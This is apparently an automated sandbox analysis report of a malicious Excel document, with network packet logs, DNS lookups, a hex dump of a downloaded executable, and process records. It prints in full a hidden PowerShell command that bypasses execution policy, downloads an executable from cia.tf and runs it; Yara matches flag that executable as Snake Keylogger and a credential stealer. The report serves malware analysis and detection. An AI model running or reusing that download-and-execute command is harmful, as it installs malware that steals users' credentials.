                                                                                          Nov 25, 2024 15:07:17.748548031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748554945 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748565912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748565912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748567104 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748584986 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748589993 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748599052 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748601913 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748606920 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748637915 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748647928 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748656034 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748680115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.967324018 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.967390060 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065577030 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065591097 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065606117 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065638065 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065649033 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065658092 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065671921 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065685987 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065709114 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065710068 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065745115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065777063 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202059984 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202075005 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202097893 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202146053 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202189922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202208042 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202239037 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.415338039 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.415452957 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.446528912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.446559906 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.446641922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455674887 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455702066 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455717087 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455785990 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455794096 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455802917 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455815077 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455835104 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455840111 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455876112 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455899000 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.503288031 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.503326893 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.503393888 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512074947 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512104988 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512124062 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512140036 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512214899 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512253046 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.563730955 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.563782930 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.563890934 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573275089 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573313951 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573332071 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573347092 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573410988 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573445082 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.722760916 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.722795963 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.722883940 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731087923 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731096983 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731115103 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731129885 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731242895 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731242895 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.778738022 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.778784990 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.778898001 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786335945 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786345959 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786360025 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786385059 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786437035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786492109 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832542896 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832566023 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832582951 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832602024 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832690954 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832745075 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839246035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839251995 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839263916 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839276075 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839329004 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839385033 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885035992 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885056973 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885085106 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885099888 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885164976 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885215044 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885230064 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.947868109 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.994313955 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:19.112240076 CET49163443192.168.2.22104.21.1.182

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 25, 2024 15:07:13.357225895 CET5456253192.168.2.228.8.8.8
                                                                                          Nov 25, 2024 15:07:13.632042885 CET53545628.8.8.8192.168.2.22

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Nov 25, 2024 15:07:13.357225895 CET192.168.2.228.8.8.80x8a63Standard query (0)cia.tfA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Nov 25, 2024 15:07:13.632042885 CET8.8.8.8192.168.2.220x8a63No error (0)cia.tf104.21.1.182A (IP address)IN (0x0001)false
                                                                                          Nov 25, 2024 15:07:13.632042885 CET8.8.8.8192.168.2.220x8a63No error (0)cia.tf172.67.129.178A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • cia.tf

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.2249163104.21.1.1824433532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-25 14:07:15 UTC186OUTGET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                                                          Host: cia.tf
                                                                                          Connection: Keep-Alive
                                                                                          2024-11-25 14:07:15 UTC975INHTTP/1.1 200 OK
                                                                                          Date: Mon, 25 Nov 2024 14:07:15 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 1072096
                                                                                          Connection: close
                                                                                          Cache-Control: public, max-age=14400
                                                                                          content-disposition: attachment; filename="Offer to purchase.exe"
                                                                                          etag: W/"105be0-1934e18f460"
                                                                                          last-modified: Thu, 21 Nov 2024 09:41:18 GMT
                                                                                          x-powered-by: Express
                                                                                          CF-Cache-Status: REVALIDATED
                                                                                          Accept-Ranges: bytes
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFOJ9tt55xf7T9lpF%2FgmqoXUEzj2xuV8RPuUbVYSwxqyqmcO1rq5Krs6CxZkKHw1RY1jqkrfY09KfuMmNnMbVMR15Swsi%2FZ3OeGojkguQu3la3E1Cb4pnL4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e82343858f98c2f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6377&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2807&recv_bytes=800&delivery_rate=1517671&cwnd=252&unsent_bytes=0&cid=45b2bf0c993284dd&ts=868&x=0"
                                                                                          2024-11-25 14:07:15 UTC394INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fe ff 3e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 f2 0f 00 00 4a 00 00 00 00 00 00 ae 10 10 00 00 20 00 00 00 20 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 10 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>gJ @ `
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6e 46 00 00 00 20 10 00 00 48 00 00 00 f4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 10 00 00 02 00 00 00 3c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 10 10 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 71 0f 00 88 9e 00 00 03 00 00 00 01 00 00 06 00 b5 00 00 d4 bc 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 8d 43 bf 3a b0 18 bf 9d 67 7c be 00 00 00 00 b9 c7 ca 3e 7e 8e 67 3f e3 dd 21 be 00 00 00 00 74 7d ff be f2 d2 5d bf 0b aa 57 bc 00 00 00 00 98 fc ef 3e 36 23 53 bf 1a
                                                                                          Data Ascii: `.rsrcnF H@@.reloc<@BHq?C:g|>~g?!t}]W>6#S
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 3e e9 d4 51 3f 2c 2c b8 be 00 00 00 00 38 2e b3 3e 1f 49 41 3f a5 f3 0d bf 00 00 00 00 81 40 7f bf 62 48 13 bd ce 07 8a 3d 00 00 00 00 66 c1 dc be 6f 0e 17 be c2 df 63 bf 00 00 00 00 76 6b 99 3e ae 9e 23 bf 33 54 35 3f 00 00 00 00 38 49 cb 3e d9 07 11 3f 7f da 38 bf 00 00 00 00 1e a3 00 bf e8 69 e0 3e 71 c8 3e bf 00 00 00 00 e8 be 8c 3d 34 4c b5 3e 1e c4 6e 3f 00 00 00 00 7b 3c 43 bd 84 d9 ec be 1a a2 62 3f 00 00 00 00 ab 42 63 be d5 96 66 3f 0e 2c bf be 00 00 00 00 6e c3 74 bf 9c 17 67 be e1 60 3f 3e 00 00 00 00 4b 21 40 be fc 70 c8 3e 3d 9e 66 bf 00 00 00 00 0b 97 65 be c4 7c a1 be 17 0e 6c 3f 00 00 00 00 2b 16 3b bf 4a 7d 09 bf 68 b2 d7 3e 00 00 00 00 e3 a4 10 bd 66 16 51 bf 09 6f 13 3f 00 00 00 00 00 ff 70 bf 21 3d 35 3e b8 05 93 be 00 00 00 00 ca df
                                                                                          Data Ascii: >Q?,,8.>IA?@bH=focvk>#3T5?8I>?8i>q>=4L>n?{<Cb?Bcf?,ntg`?>K!@p>=fe|l?+;J}h>fQo?p!=5>
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 00 00 00 00 10 88 b1 bd 4b e5 55 3f 69 e5 0a bf 00 00 00 00 60 56 6c 3f 7c 99 08 3e fc 8b b8 be 00 00 00 00 c5 73 78 3b 94 69 84 be f1 49 77 3f 00 00 00 00 2a e2 74 3e a6 09 7b 3e c7 84 70 bf 00 00 00 00 32 3c 42 3f 90 4d 0e bf 5d e1 ad 3e 00 00 00 00 c5 38 97 3e 7d 78 9e 3e 80 63 67 3f 00 00 00 00 aa 96 59 3d ba f7 68 bf d8 7e d2 be 00 00 00 00 af 78 8a 3e d9 f4 bb 3c c7 63 76 bf 00 00 00 00 51 4a 10 3f c6 da 04 3d 90 4c 53 3f 00 00 00 00 ec 13 20 3e ee ed 16 3e 79 05 7a 3f 00 00 00 00 67 fe 27 bd d1 58 7b 3f a4 c1 3d 3e 00 00 00 00 62 68 c5 be 37 8b 13 bf fb 74 38 bf 00 00 00 00 c4 cc c6 3e 72 89 67 3f 5e f1 34 3e 00 00 00 00 49 10 72 3f d4 7c 45 be 00 38 86 be 00 00 00 00 6a 31 58 3f 5e 2b 05 3f 7c 61 02 3e 00 00 00 00 a5 88 07 3d 65 c6 7f 3f b6 f2 d2
                                                                                          Data Ascii: KU?i`Vl?|>sx;iIw?*t>{>p2<B?M]>8>}x>cg?Y=h~x><cvQJ?=LS? >>yz?g'X{?=>bh7t8>rg?^4>Ir?|E8j1X?^+?|a>=e?
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 0b 72 bf c0 2b b8 3d 00 00 00 00 16 a3 fe be d4 9a 36 3e 29 5a 59 3f 00 00 00 00 64 20 cf bd bc 23 7b bf cd 72 29 3e 00 00 00 00 58 8d 05 bf c3 af 62 3d 5a f1 59 bf 00 00 00 00 39 43 49 bf d6 74 15 bf d2 8a 4f 3e 00 00 00 00 5b b0 10 bf 49 65 52 3f a9 5c 92 bd 00 00 00 00 c6 33 e0 3e a6 42 1c 3e a7 cf 62 bf 00 00 00 00 55 87 6c bf 90 f5 b4 3e c6 dc 15 be 00 00 00 00 13 48 59 3e 75 ae 50 bf df f9 09 bf 00 00 00 00 98 f8 5b bf c3 d8 12 3e 7f 67 fb be 00 00 00 00 4f c9 7d 3f 07 0b e7 3d 9c 45 89 3d 00 00 00 00 b5 65 0a 3d 23 da 7a bf ab 5f 49 be 00 00 00 00 97 00 00 00 a0 00 00 00 89 00 00 00 5b 00 00 00 5a 00 00 00 0f 00 00 00 83 00 00 00 0d 00 00 00 c9 00 00 00 5f 00 00 00 60 00 00 00 35 00 00 00 c2 00 00 00 e9 00 00 00 07 00 00 00 e1 00 00 00 8c 00 00 00
                                                                                          Data Ascii: r+=6>)ZY?d #{r)>Xb=ZY9CItO>[IeR?\3>B>bUl>HY>uP[>gO}?=E=e=#z_I[Z_`5
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: ff ff 01 00 00 00 00 00 00 00 ff ff ff ff 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00 00 00 00 01 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 01 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 01 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 01 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 ff ff ff ff 00
                                                                                          Data Ascii:
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: ff ff 7f 7f 2a 1a 22 ff ff 7f ff 2a 1e 02 7b 18 00 00 04 2a 22 02 03 7d 18 00 00 04 2a 1e 02 7b 17 00 00 04 2a 22 02 03 7d 17 00 00 04 2a 1e 02 7b 14 00 00 04 2a 22 02 03 7d 14 00 00 04 2a 1e 02 7b 19 00 00 04 2a 1e 02 7b 16 00 00 04 2a 1e 02 7b 15 00 00 04 2a 22 02 03 7d 15 00 00 04 2a a2 03 16 3f 07 00 00 00 04 16 3c 0b 00 00 00 72 4b 01 00 70 73 40 00 00 0a 7a 02 04 7d 16 00 00 04 02 03 7d 19 00 00 04 2a 1e 02 7b 1b 00 00 04 2a 1e 02 7b 1a 00 00 04 2a 1e 02 7b 1c 00 00 04 2a 1e 02 7b 1d 00 00 04 2a 86 02 28 5d 00 00 06 02 22 00 00 34 c3 22 00 00 34 43 22 00 00 20 c1 22 00 00 20 41 28 63 00 00 06 2a e2 03 04 3c 08 00 00 00 05 0e 04 44 0b 00 00 00 72 95 01 00 70 73 40 00 00 0a 7a 02 03 7d 1a 00 00 04 02 04 7d 1c 00 00 04 02 05 7d 1b 00 00 04 02 0e 04 7d
                                                                                          Data Ascii: *"*{*"}*{*"}*{*"}*{*{*{*"}*?<rKps@z}}*{*{*{*{*(]"4"4C" " A(c*<Drps@z}}}}
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 5a 10 01 02 7b 3c 00 00 04 03 6f c3 00 00 06 2a 8a 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 02 7b 3d 00 00 04 03 04 6f b1 00 00 06 2a b6 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 05 02 7b 37 00 00 04 5a 10 03 02 7b 3e 00 00 04 03 04 05 6f 87 00 00 06 2a ea 03 02 7b 37 00 00 04 5a 10 01 04 02 7b 37 00 00 04 5a 10 02 05 02 7b 37 00 00 04 5a 10 03 0e 04 02 7b 37 00 00 04 5a 10 04 02 7b 3f 00 00 04 03 04 05 0e 04 6f c2 00 00 06 2a ba 02 28 ae 00 00 06 02 22 00 00 00 40 7d 38 00 00 04 02 22 00 00 80 3f 7d 3b 00 00 04 02 22 66 66 66 3f 7d 40 00 00 04 02 28 b0 00 00 06 2a 1e 02 7b 47 00 00 04 2a 22 02 03 7d 47 00 00 04 2a 1e 02 7b 48 00 00 04 2a 22 02 03 7d 48 00 00 04 2a 4a 02 22 00 00 80 3f 7d 47 00 00 04 02 28 ae 00 00 06
                                                                                          Data Ascii: Z{<o*{7Z{7Z{=o*{7Z{7Z{7Z{>o*{7Z{7Z{7Z{7Z{?o*("@}8"?};"fff?}@(*{G*"}G*{H*"}H*J"?}G(
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 6a 00 00 04 2a 22 02 03 7d 6a 00 00 04 2a 1e 02 7b 69 00 00 04 2a 22 02 03 7d 69 00 00 04 2a 4a 02 22 00 00 80 3f 7d 6a 00 00 04 02 28 08 01 00 06 2a 4e 02 22 00 00 80 3f 7d 6a 00 00 04 02 03 28 09 01 00 06 2a 86 02 22 00 00 80 3f 7d 6a 00 00 04 02 03 28 09 01 00 06 02 04 7d 6a 00 00 04 02 05 7d 69 00 00 04 2a 8a 02 7b 57 00 00 04 74 16 00 00 02 03 04 05 6f 87 00 00 06 02 7b 6a 00 00 04 5a 02 7b 69 00 00 04 58 2a 1e 02 7b 6c 00 00 04 2a 22 02 03 7d 6c 00 00 04 2a 4e 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 28 08 01 00 06 2a 52 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 03 28 09 01 00 06 2a 6e 02 18 73 68 00 00 0a 7d 6b 00 00 04 02 03 28 09 01 00 06 02 04 7d 6c 00 00 04 2a ea 02 7b 6b 00 00 04 03 6f 69 00 00 0a 39 16 00 00 00 72 d7 04 00 70 03 8c 38 00 00 01 28
                                                                                          Data Ascii: j*"}j*{i*"}i*J"?}j(*N"?}j(*"?}j(}j}i*{Wto{jZ{iX*{l*"}l*Nsh}k(*Rsh}k(*nsh}k(}l*{koi9rp8(
                                                                                          2024-11-25 14:07:15 UTC1369INData Raw: 00 04 02 7b b3 00 00 04 58 02 7b b2 00 00 04 58 7e af 00 00 04 6f 77 00 00 0a 61 7d b0 00 00 04 2a 92 02 28 b3 01 00 06 02 03 7d b4 00 00 04 02 04 7d b3 00 00 04 02 05 7d b2 00 00 04 02 0e 04 7d b1 00 00 04 2a 9e 02 28 b3 01 00 06 02 03 7d b4 00 00 04 02 04 7d b3 00 00 04 02 05 7d b2 00 00 04 02 20 ff 00 00 00 7d b1 00 00 04 2a 2a 02 03 04 17 28 b7 01 00 06 2a 2a 02 03 04 16 28 b7 01 00 06 2a f6 02 6f a9 01 00 06 02 6f a7 01 00 06 02 6f a5 01 00 06 28 7a 00 00 0a 28 7a 00 00 0a 02 6f a9 01 00 06 02 6f a7 01 00 06 02 6f a5 01 00 06 28 7a 00 00 0a 28 7b 00 00 0a 58 18 5b d2 2a 62 02 6f a9 01 00 06 02 6f a7 01 00 06 58 02 6f a5 01 00 06 58 19 5b d2 2a ae 22 3d 0a 57 3e 02 6f a9 01 00 06 6b 5a 22 8f c2 35 3f 02 6f a7 01 00 06 6b 5a 58 22 29 5c 8f 3d 02 6f a5
                                                                                          Data Ascii: {X{X~owa}*(}}}}*(}}} }**(**(*ooo(z(zooo(z({X[*booXoX[*"=W>okZ"5?okZX")\=o


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:09:07:07
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                          Imagebase:0x13f960000
                                                                                          File size:28'253'536 bytes
                                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:09:07:09
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
                                                                                          Imagebase:0x13f680000
                                                                                          File size:443'392 bytes
                                                                                          MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:09:07:18
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\tmp7752.exe"
                                                                                          Imagebase:0x1310000
                                                                                          File size:1'072'096 bytes
                                                                                          MD5 hash:2ED7362E959D42385D4E6D231A6840DD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
